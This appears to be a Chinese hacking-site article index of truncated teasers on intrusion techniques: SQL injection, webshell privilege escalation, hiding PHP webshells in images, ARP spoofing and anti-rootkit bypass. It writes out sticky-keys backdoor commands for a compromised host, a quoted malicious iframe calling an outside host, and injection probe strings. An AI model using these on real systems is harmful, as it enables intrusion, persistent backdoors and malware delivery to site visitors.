众所周知交换机和路由器都需要有一定的安全保证，也就是说要及时为他们配置合理的密码，那么如果这个密码忘记了怎么办呢？笔者就遇到过这么一次，由于岗位调动，以前的网络管理员离开了本部门，却把交换机上设置了密码，而且没有告诉我这个接任的网络管理员。怎么办呢？送回厂商破解又太麻烦了。于是我亲手经历了一次破解密码的过程。一，网络环...

[阅读全文]

　　【编者按：系统密码忘记了，可以借助工具进入。那么反过来，这个工具也会被某些别有用心的人所利用。攻防之道，存乎一心，看来这类的话题仍将继续。】　　WindowsNT、2000、XP的安全性能较之9x有很大提高，可是凡事有利必有弊，如果我们不慎忘记了管理员密码，那么要进入系统可不是一件容易的事。好在，我们现在有了深山红...

[阅读全文]

在WindowsXP中使用“Ctrl+Alt+Del”组合键，进入“Windows任务管理器”，在“进程”选项卡中可以查看本机完整的进程列表，而且可以通过手工定制进程列表的方式获得更多的进程信息，如会话ID、用户名等，但遗憾的是，我们查看不到这些进程到底提供了哪些系统服务。其实，在WindowsXP中新增的一个命令行工...

[阅读全文]

以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。SQL语句如下：用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）xtype=99ntextxtype=35textxtype=231nvarcharxtype=167varcha...

[阅读全文]

去年的时候已经拿到了这个站的SHELL，可是后门很早就被K了，今天无意间又得到了注入，啊D检测很快就出来了令人欣喜的信息，SA权限，转到NB里面可以列目录但是不能执行，telnet对方1433不能连接，因为曾经入侵过一次知道WEB和SQL在同一台机器上，所以确定对方改了MSSQL端口。　　尝试在NB里面恢复CMDSHE...

[阅读全文]

Radmin软件的一次提权技巧作者：不详文章来源：华盟收集点击数：146更新时间：2008-3-130:25:38最近做渗透测试时常碰到RADMIN一类的东西..一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的)HKEY_LOCAL_MACHINE\SYSTEM\RA...

[阅读全文]

前言　　中国的房子日益增长，房产商也赚得不亦乐乎。特别是大过年，买房子的也多了，高兴的是房产商在背后数钱数到手抽筋，特别是厦门这个美丽鹭岛。哎，现在想买房子都难呀，只能看房子的份了，看看可恶的房地产商，生在福建当然岛福建要了解福建楼市咯，百度搜搜输入“福建楼市”，跳出了第一个就直接进去了，如图　...

[阅读全文]

国家或地区BrazilChinaUnitedStatesAustraliaThailandArgentinaIndiaSouthAfricaUnitedArabEmiratesPakistanKuwaitDenmarkMexicoColombiaGreatBritain(UK)MoldaviaGermanyHungar...

[阅读全文]

国家或地区BrazilChinaUnitedStatesAustraliaThailandArgentinaIndiaSouthAfricaUnitedArabEmiratesPakistanKuwaitDenmarkMexicoColombiaGreatBritain(UK)MoldaviaGermanyHungar...

[阅读全文]

很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时，会发现在连接对方机器后，无法像内网计算机那样可以互传文件，这在很大程度上使入侵后的攻击大打折扣，其实打上微软自家的“补丁”就可以解决这个问题。　　在此，笔者就要为大家介绍一下服务器端和客户端的配置方法，让大家能够通过3389终端服务，实现终端机器与本地机器的文件...

[阅读全文]

在肉鸡上执行命令copyc:\windows\explorer.exec:\windows\system32\sethc.execopyc:\windows\system32\sethc.exec:\windows\system32\dllcache\sethc.exe以后再连接肉鸡3389，敲5下shift键就可以直...

[阅读全文]

右键另存再打开测试文档，否则会调用IE的插件打开，测试会失败。如果你硬要通过点击打开的话，点击这里吧,嘿嘿，这本身也是IE的一个解析漏洞。在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候，一时还没有想到怎么利用。后来结合去年有一个关于pdfa...

[阅读全文]

只要在其安装目录下新建一个文件名为ws2_32.dll的文件，这样系统就会以文件出错误而禁止运行（可以新建一个内容为空的文本文件，然后改名为ws2_32.dll）本方法适用基于NT系统的WinXP,Win2000,Win2003比较险恶~~用的时候再删除该文件就是。想在自己电脑上禁止朋友玩游戏，又不能让人看出来是故意的...

[阅读全文]

当网站成为黑客热爱的攻击的目标，也成为散播恶意程序的跳板，企业蒙受的风险与损失随之扩大，也会让网站使用者受到波及。　　目前Google开始在搜寻结果中加入提醒字符串，标示受骇的网站，对企业而言，更可能因此流失用户。　　如何在这波烽火中生存，最重要的是必须正视问题的严重性，在网站开发与维运阶段提升安全意识。另外，也可藉由...

[阅读全文]

　　本文描述了一些方法，可以绕过目前主流的现代Anti-rootkit工具，包括但不限于:Icesword最新版、Gmer最新版、Rootkitunhooker最新版、DarkSpy最新版以及AVGAnti-rootkit最新版等等　　目前的anti-rootkit工具中，对于内核模块主要采用如下几种扫描方式:　　1....

[阅读全文]

不管是访问服务器上的任何网页，就连404的页面也会在<html>后加入：<IFRAMESRC=http://cool.47555.com/k.htmwidth=1height=1frameborder=0></IFRAME>;,挂马的位置在html标记左右,上面这段恶意代码，它会每隔几秒加入代码，也就是说在输出具体的东...

[阅读全文]

现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。　　1.网宽网络有限公司制作的网站基本都有注入漏洞搜索网宽网络　　2.搜索栏里输入　　关键字%'and1=1and'%'='　　关键字%'and1=2and'%'='　　比较不同处可以作为注...

[阅读全文]

黑客破解不可避免要破解密码，本文不从破解技术入手，而从黑客技巧入手分析密码心理学。本文完全不涉及到具体的技术，完全是心理学、信息学内容。本来也懒得写，因为这是一个很大的内容，自己想到只是一点而已，我的见解简直是井底蛙看到的天空。不过几个月前心血来潮写了提纲，也就对着提纲详细写下来，没有再花太多心思思考，见谅。密码心理学...

[阅读全文]

软件开发人员希望自己的软件安装起来简单而迅速。黑客们也是这样的。RSA安全公司的分析师们在上个月早些时候发现了一种PHP代码，它能够在2秒内往被攻击的服务器上安装上一个钓鱼站点。RSA在周二发布的6月份的《每月网络诈骗报告》中发布了这一消息。这些代码包含了创建骗人网站所需的全部HTML（超文本标识语言）和图片，该网站欺...

[阅读全文]

ADSL作为一种宽带接入方式已经被广大用户接受，现在一些用户家里有很多台电脑，通过一台ADSL路由器拨号上网，这样充分利用了带宽，对于家中有多台电脑需共享上网的用户来说，一般可通过建立和配置代理服务器来实现共享上网，缺点是主机必须开着才能实现共享；另外一种有效的方法是使用路由器来实现共享，这样每个客户端都能独立上网，不...

[阅读全文]

PS:很久的文章了，07年4月的，最近找到修改了下就发上来,文章有些乱，请大家不要见怪记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话，改怎么注入啊？当时我随口说了句“or注入”，后来又一次看贴的时候，看到他问我该怎么利用呢？我就写了几个简单的语句给他，叫他自己变换，他很感激我，还说网上没有这种方法。我到...

[阅读全文]

很多的时候，入侵并不是单纯靠技术的，有很多是运气因素，更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个东西，当一台服务器摆在你面前时，大概的看下就知道服务器的安全到底如何了，特别是对于入侵之后的webshell的提升，更多的依赖于管理员的安全意识。由于本人的技术不好，不能自己发现溢出漏洞，所以在...

[阅读全文]

信息来源：邪恶八进制安全小组如何灵活地运用SQLInjection做数据库渗透的一种思路如今，很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方www.xxxxx.com/blog.asp?id=4当加入"'"符号进行注入测试时，www.xxxxx.com/blog.asp?i...

[阅读全文]

前言　　通常，大家所说的入侵，都是针对一台主机，在获得管理员权限后，就很是得意；其实，真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多，但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是，不管使用什么技术，无非都是抓取目标的数据包，然后分析出敏感数据。如果目标内部采用的是共享式网络（采用HUB集线器连网），...

[阅读全文]

前些日子搞一个站..拿到了WEBSHELL可就是提权不了...分析了下也只有通过autorun.inf提权但是貌似时间不能等了..目标是拿到完整数据库文件..可webdata是分离的..后来在硬盘里转悠了老半天.发现管理员都是在web上操作data有一个目录有数据库的完整的备份..爽歪了..复制到www目录下后...发...

[阅读全文]

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，如果说硬是要放到HTML文件或图片里，就接着往下看的这篇测试报告吧。要知道如果光把PHP语句放到图片里是无论如何也不能执行的，因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行...

[阅读全文]

WINDOWS访问139端口时自动用当前用户、密码连接，造成泄露用户密码，虽然其密码是加密的，但一样可以用来攻击。　　下面是SMB的密码认证方式。　　WINDOWS的139口的访问过程，箭头表示数据方向：　　1.客户端<建立TCP连接->服务端　　2.客户端---客户端类型、支持的服务方式列表等-->服务端　　3.客户...

[阅读全文]

说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～嘻嘻～～好跟我来，看看有什么可以利用的来提升权限.第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的DocumentsandSettings/Al...

[阅读全文]

常有人问我这个问题“怎样进入内网”，怎么回答呢，归纳起来就是一句话“突破网关，利用端口重定向进入内网”。首选要突破网关（GetWay），这很容易理解，因为一个内网要访问internet总是必然通过网关接入的，至于怎样突破网关，这和进入不是网关的服务器没有什么两样，就不说了。突破网关以后，我们的目标就是通过网关（IP为2...

[阅读全文]

我想今天就向大家介绍一下关于暴力破解的知识和破解经验。这个当然也是我个人的经验，但是对于高手来说应还有其它方面的经验，如果你认为我的经验不足的话，希望能够来信补充一下。现在就开始介绍暴力破解的原理。对于暴力破解通常是无法得到注册码或是注册码的运算过程太复杂，无法通常计算得到（这里指使用反推法来计算注册码）所以就能够使用...

[阅读全文]